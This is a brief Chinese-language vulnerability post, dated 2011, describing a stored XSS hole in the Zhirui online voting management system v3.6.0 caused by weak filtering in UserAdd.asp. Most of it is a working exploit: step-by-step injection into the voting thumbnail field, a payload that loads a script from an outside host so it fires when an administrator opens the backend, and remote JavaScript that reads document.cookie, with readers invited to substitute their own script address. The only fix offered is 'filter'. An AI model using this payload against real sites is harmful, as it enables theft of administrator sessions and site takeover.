智睿网络投票评选管理系统v3.6.0XSS漏洞

发布日期：2011-01.14
发布作者：B0mbErM@n

影响版本：智睿网络投票评选管理系统v3.6.0
官方网站：http://www.zhirui.net

漏洞类型：跨站XSS
漏洞描述：UserAdd.asp过滤不严导致提交跨站代码执行js脚本。

Exp:注册用户 > 发表评选 > 评选缩图中插入XSS代码
"><SCRIPT SRC=http://521.im/XSS/xss.js></SCRIPT>
然后等后台打开时触发.js地址神马的自己替换..js的强大就不解释了..
 

JS：

document.write ("This is remote text via xss.js located at 521.im " + document.cookie);  alert ("This is remote text via xss.js located at 521.im " + document.cookie); 

修补：过滤呀过滤
 

标签分类： 跨站XSS